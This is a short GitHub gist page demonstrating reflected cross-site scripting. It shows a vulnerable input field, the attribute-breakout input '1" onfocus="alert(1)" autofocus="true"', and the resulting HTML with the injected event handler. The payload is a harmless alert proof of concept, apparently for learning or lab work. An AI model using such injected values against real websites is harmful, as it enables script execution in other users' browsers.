Skip to content

Instantly share code, notes, and snippets.

@FernandoZhuang
Created June 13, 2018 14:23
Show Gist options
  • Save FernandoZhuang/109bc88d4f640365c1c37225603c20a9 to your computer and use it in GitHub Desktop.
Save FernandoZhuang/109bc88d4f640365c1c37225603c20a9 to your computer and use it in GitHub Desktop.
XssReflectedCrossSiteScript
<!--Vulnerbility注入点:<label><h4><input type="text" name="test" value="1"> -->
<!--Inject输入: 1" onfocus="alert(1)" autofocus="true" -->
<label><h4><input type="text" name="test" value="1" onfocus="alert(1)" autofocus="true"></h4></label>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment